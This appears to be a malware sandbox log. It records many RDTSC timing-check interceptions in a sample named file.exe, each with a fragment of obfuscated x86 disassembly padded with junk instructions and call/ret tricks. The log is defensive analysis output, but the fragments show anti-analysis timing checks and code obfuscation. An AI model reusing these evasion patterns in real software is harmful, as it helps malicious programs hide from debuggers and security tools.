Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE1BB second address: BBE279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F702C87CB9Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 1CF23282h 0x00000014 mov edi, 3F5952ADh 0x00000019 pushad 0x0000001a mov eax, dword ptr [ebp+122D36E8h] 0x00000020 mov ebx, dword ptr [ebp+122D36F0h] 0x00000026 popad 0x00000027 push 00000003h 0x00000029 jmp 00007F702C87CB9Eh 0x0000002e push 00000000h 0x00000030 jmp 00007F702C87CBA6h 0x00000035 push 00000003h 0x00000037 mov ecx, 1F9DD9F2h 0x0000003c mov si, dx 0x0000003f call 00007F702C87CB99h 0x00000044 push esi 0x00000045 jmp 00007F702C87CB9Eh 0x0000004a pop esi 0x0000004b push eax 0x0000004c jmp 00007F702C87CB9Eh 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 jmp 00007F702C87CBA5h 0x0000005a mov eax, dword ptr [eax] 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F702C87CBA5h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE279 second address: BBE29D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F702D6C0E53h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE37A second address: BBE3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D3924h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F702C87CB98h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 movsx esi, cx 0x0000002c add ch, 00000015h 0x0000002f call 00007F702C87CB99h 0x00000034 jmp 00007F702C87CBA6h 0x00000039 push eax 0x0000003a jg 00007F702C87CBA4h 0x00000040 push eax 0x00000041 push edx 0x00000042 jc 00007F702C87CB96h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE3DA second address: BBE3E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE3E9 second address: BBE4A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a ja 00007F702C87CB98h 0x00000010 jne 00007F702C87CB9Ch 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push ebx 0x0000001c jmp 00007F702C87CBA4h 0x00000021 pop ebx 0x00000022 pop eax 0x00000023 mov di, 97C7h 0x00000027 push 00000003h 0x00000029 jmp 00007F702C87CBA6h 0x0000002e push 00000000h 0x00000030 mov si, F17Eh 0x00000034 push 00000003h 0x00000036 sbb dx, 5285h 0x0000003b push 803231E2h 0x00000040 pushad 0x00000041 jmp 00007F702C87CBA1h 0x00000046 push esi 0x00000047 ja 00007F702C87CB96h 0x0000004d pop esi 0x0000004e popad 0x0000004f add dword ptr [esp], 3FCDCE1Eh 0x00000056 call 00007F702C87CB9Fh 0x0000005b pushad 0x0000005c sub edx, dword ptr [ebp+122D1BB2h] 0x00000062 mov cx, B22Bh 0x00000066 popad 0x00000067 pop ecx 0x00000068 lea ebx, dword ptr [ebp+12452052h] 0x0000006e mov dl, D4h 0x00000070 xchg eax, ebx 0x00000071 jl 00007F702C87CBA4h 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0063 second address: BD0067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBCD8 second address: BDBCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBCDC second address: BDBCEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F702D6C0E4Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDC174 second address: BDC17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDC17A second address: BDC1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702D6C0E51h 0x00000009 popad 0x0000000a push ecx 0x0000000b jl 00007F702D6C0E63h 0x00000011 jc 00007F702D6C0E46h 0x00000017 jmp 00007F702D6C0E57h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDC31B second address: BDC31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDC31F second address: BDC32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDC32A second address: BDC345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CBA3h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDC4C2 second address: BDC4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDC8AE second address: BDC8CB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F702C87CBA0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDCB80 second address: BDCB84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDCB84 second address: BDCB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F702C87CB96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDCD4E second address: BDCD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDCD52 second address: BDCD58 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDCD58 second address: BDCD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDCF2D second address: BDCF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDCF33 second address: BDCF37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD094 second address: BDD098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD098 second address: BDD09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD09C second address: BDD0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD0A2 second address: BDD0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F702D6C0E46h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD0B6 second address: BDD0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD0BC second address: BDD0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F702D6C0E53h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F702D6C0E50h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD743 second address: BDD747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD747 second address: BDD751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD751 second address: BDD755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDDCDE second address: BDDCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDDCE2 second address: BDDCE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDDCE6 second address: BDDD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F702D6C0E54h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDDD00 second address: BDDD05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE25F3 second address: BE2614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2614 second address: BE2618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2618 second address: BE261C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE261C second address: BE2622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2622 second address: BE262C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F702D6C0E46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE262C second address: BE2630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2D90 second address: BE2D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2D96 second address: BE2D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2D9A second address: BE2DD8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jg 00007F702D6C0E5Ah 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jmp 00007F702D6C0E4Eh 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2DD8 second address: BE2DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2DDE second address: BE2DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2DE2 second address: BE2DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2DE6 second address: BE2E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F702D6C0E55h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE9352 second address: BE9358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE9358 second address: BE935C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE935C second address: BE939C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA6h 0x00000007 jmp 00007F702C87CBA7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jp 00007F702C87CBA2h 0x00000015 jp 00007F702C87CB96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE881D second address: BE8827 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8827 second address: BE882E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8B12 second address: BE8B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8B16 second address: BE8B3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F702C87CBA3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8B3E second address: BE8B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8B46 second address: BE8B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8D02 second address: BE8D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702D6C0E50h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8D1A second address: BE8D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8D20 second address: BE8D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC3CD second address: BEC3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CBA4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC3E6 second address: BEC3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC60D second address: BEC613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC7CB second address: BEC7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC7D0 second address: BEC7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F702C87CB96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BECAF9 second address: BECB10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F702D6C0E53h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED045 second address: BED05E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F702C87CB96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jnp 00007F702C87CBA4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED05E second address: BED062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED32B second address: BED330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED512 second address: BED51C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED6F8 second address: BED6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEDBDB second address: BEDBF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEE624 second address: BEE648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F702C87CB96h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEE648 second address: BEE64E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF6A6 second address: BEF70E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F702C87CB98h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 jmp 00007F702C87CBA7h 0x0000002b push 00000000h 0x0000002d add edi, dword ptr [ebp+122D17D6h] 0x00000033 push 00000000h 0x00000035 xor dword ptr [ebp+122D2AFBh], esi 0x0000003b mov di, 0F39h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF70E second address: BEF713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF0B8C second address: BF0B91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF0B91 second address: BF0BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F702D6C0E48h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF15ED second address: BF15F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF15F1 second address: BF161A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F702D6C0E53h 0x00000010 jmp 00007F702D6C0E4Dh 0x00000015 popad 0x00000016 push eax 0x00000017 je 00007F702D6C0E58h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF161A second address: BF161E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF161E second address: BF1622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1622 second address: BF169D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F702C87CB98h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov edi, 0F4EBF92h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F702C87CB98h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 jmp 00007F702C87CBA2h 0x00000049 mov edi, dword ptr [ebp+122D3934h] 0x0000004f xchg eax, ebx 0x00000050 push ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F702C87CB9Bh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF169D second address: BF16A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF16A1 second address: BF16B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jo 00007F702C87CBA4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF16B3 second address: BF16B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF219A second address: BF21E9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F702C87CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F702C87CB98h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov esi, 42B3A992h 0x0000002b sub dword ptr [ebp+122D335Fh], esi 0x00000031 push 00000000h 0x00000033 mov si, dx 0x00000036 push 00000000h 0x00000038 mov si, ax 0x0000003b push eax 0x0000003c pushad 0x0000003d jo 00007F702C87CB9Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2C94 second address: BF2C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2C9A second address: BF2C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2C9F second address: BF2CA4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
